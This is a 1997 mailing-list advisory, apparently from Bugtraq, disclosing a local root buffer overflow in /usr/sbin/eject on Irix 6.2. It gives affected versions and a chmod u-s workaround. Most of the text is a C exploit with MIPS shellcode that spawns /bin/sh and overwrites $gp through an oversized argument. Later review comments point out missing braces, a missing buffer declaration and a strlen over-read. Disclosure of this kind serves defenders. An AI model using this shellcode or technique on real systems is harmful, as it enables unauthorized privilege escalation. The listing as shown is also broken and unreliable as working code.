
Irix buffer overflow in /usr/sbin/eject

From: hedley () CS BRIS AC UK (David Hedley)
Date: Sun, 25 May 1997 17:32:50 +0100

Hi there again,

Following on from Yuri's email about buffer overflowing on Irix, I
include an exploit for /usr/sbin/eject. As mentioned previously, we
smash $gp instead of $ra and so the exploit is slightly different to the
last exploit for /bin/df...

Vulnerable: Irix 6.2 (possibly 6.1 and 6.0.1 also - I haven't tested them)

Not vulnerable: Irix 5.x - buffer overflow exists, but is virtually
                           unexploitable due to the stack position.
                Irix 6.3 - appears to have been fixed.

Impact: local users can gain root privileges

Tested on: Power Challenge (R8000) Irix64 6.2

Temporary fix: chmod u-s /usr/sbin/eject



p.s. Yuri's exploit for /usr/bsd/ordist works on our R8000 PChallenge
     (Irix64 6.2)
p.p.s. Can the administrator of bugtraq (and best-of-security) please
     include an 'Errors-to:' or similar field in outgoing mail so
     bounces from the list don't come back to the original sender?

 David Hedley (hedley () cs bris ac uk)
 finger hedley () cs bris ac uk for PGP key
 Computer Graphics Group | University of Bristol | UK

-------------------- cut here -------------------------------

/* /usr/sbin/eject exploit by DCRH 25/5/97
 * Tested on: R8000 Power Challenge (Irix64 6.2)
 * Exploit doesn't work on Irix 5.x due to stack position
 * Irix 6.3 does not appear to be vulnerable
 * compile as: cc -n32 eject.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Layout constants for the argument string built in main (all byte counts;
 * main divides them by sizeof(u_long) to get word counts). */
#define NUM_ADDRESSES   80           /* bytes of guessed-address words written first */
#define BUF_LENGTH      400          /* bytes of NOP sled + payload written next */
#define EXTRA           200          /* bytes of (targ_addr + GP_OFFSET) words written last */
#define OFFSET          -0x128       /* added to this process's $sp to guess the target address */
#define GP_OFFSET       32412        /* added to targ_addr to form the trailing words */
#define IRIX_NOP        0x03e0f825    /* move $ra,$ra */

/* NOTE(review): the code treats u_long as a 32-bit word (see the -n32 check in
 * main); <sys/types.h> may already typedef u_long, so redefining it as a
 * macro after that include is fragile. */
#define u_long unsigned

/* Three MIPS instructions that hand back the caller's $sp in $v0 (per the
 * inline disassembly); main casts this array to a function pointer and
 * calls it, which relies on the array living in executable memory.
 * NOTE(review): the closing `};` is missing from the archived listing. */
u_long get_sp_code[] = {
    0x03a01025,         /* move $v0,$sp         */
    0x03e00008,         /* jr $ra               */
    0x00000000,         /* nop                  */

/* Payload words that main copies into the argument string after the NOP
 * sled.  The per-word comments are the author's disassembly; the final two
 * words spell "/bin/sh".  None of the words contains a zero byte, which
 * matters because main measures the payload with strlen().
 * NOTE(review): the closing `};` is missing from the archived listing. */
u_long irix_shellcode[] = {
    0x24041234,         /* li $4,0x1234         */
    0x2084edcc,         /* sub $4,0x1234        */
    0x0491fffe,         /* bgezal $4,pc-4       */
    0x03bd302a,         /* sgt $6,$sp,$sp       */
    0x23e4012c,         /* addi $4,$31,264+36   */
    0xa086feff,         /* sb $6,-264+7($4)     */
    0x2084fef8,         /* sub $4,264           */
    0x20850110,         /* addi $5,$4,264+8     */
    0xaca4fef8,         /* sw $4,-264($5)       */
    0xaca6fefc,         /* sw $4,-260($5)       */
    0x20a5fef8,         /* sub $5, 264          */
    0x240203f3,         /* li $v0,1011          */
    0x03ffffcc,         /* syscall 0xfffff      */
    0x2f62696e,         /* "/bin"               */
    0x2f7368ff,         /* "/sh"                */


/*
 * Builds the oversized argument string and execs /usr/sbin/eject with it.
 *
 * argv[1] (optional): an adjustment, in 4-byte words, added to the guessed
 *   target address when the default guess misses.
 * Returns nothing: on success the exec replaces this process; on failure
 *   perror() reports the error.
 *
 * NOTE(review): as archived this listing is incomplete -- the opening brace
 * of main, the closing braces of the two `if` bodies and of main, and the
 * declaration of `buf` (the array long_p writes into) are all missing, so
 * it does not compile as shown.  `void main` is also non-standard C.
 */
void main(int argc, char **argv)
    char *env[] = {NULL};               /* empty environment for the exec */
    u_long targ_addr, stack;
    u_long *long_p;
    /* strlen() scans the payload for a zero byte; no word in
     * irix_shellcode contains one, so the length found depends on whatever
     * follows the array in memory -- a latent out-of-bounds read. */
    int i, code_length = strlen((char *)irix_shellcode)+1;
    /* Treat the get_sp_code words as a function that returns this
     * process's $sp. */
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    /* A $sp with the top bit set is taken to mean the binary was not built
     * with -n32 (see the message); whatever exit followed the printf is not
     * in the archived listing. */
    if (stack & 0x80000000) {
        printf("Recompile with the '-n32' option\n");

    long_p =(u_long *)  buf;            /* buf: declaration missing from the listing */
    targ_addr = stack + OFFSET;         /* guess at where buf will land */

    if (argc > 1)
      targ_addr += atoi(argv[1]) * 4;   /* manual adjustment in words; atoi() reports no errors */

    /* Same top-bit check as above, applied to the trailing-word value. */
    if (targ_addr + GP_OFFSET > 0x80000000) {
        printf("Sorry - this exploit for Irix 6.x only\n");

    /* buf is passed as an argv string below, so a zero byte inside the
     * address would truncate it; step forward until every byte is non-zero. */
    while ((targ_addr & 0xff000000) == 0 ||
           (targ_addr & 0x00ff0000) == 0 ||
           (targ_addr & 0x0000ff00) == 0 ||
           (targ_addr & 0x000000ff) == 0)
      targ_addr += 4;

    /* Layout of buf in 4-byte words (i is int and each bound is size_t, so
     * every comparison below is signed/unsigned):
     *   NUM_ADDRESSES bytes of the guessed address, biased by NUM_ADDRESSES/2;
     *   (BUF_LENGTH - code_length) bytes of IRIX_NOP;
     *   code_length/4 payload words (any odd tail bytes are dropped);
     *   EXTRA bytes of targ_addr + GP_OFFSET;
     *   one zero word as terminator.
     * The size of buf is not visible, so whether all of this fits cannot
     * be confirmed from here. */
    for (i = 0; i < NUM_ADDRESSES/sizeof(u_long); i++)
        *long_p++ = targ_addr + NUM_ADDRESSES/2;

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;

    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = targ_addr + GP_OFFSET;

    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

    /* The bare 0 ending the variadic argument list should be a pointer
     * ((char *)0 / NULL).  The perror() text says execl but the call is
     * execle. */
    execle("/usr/sbin/eject", "eject", buf, 0, env);
    perror("execl failed");
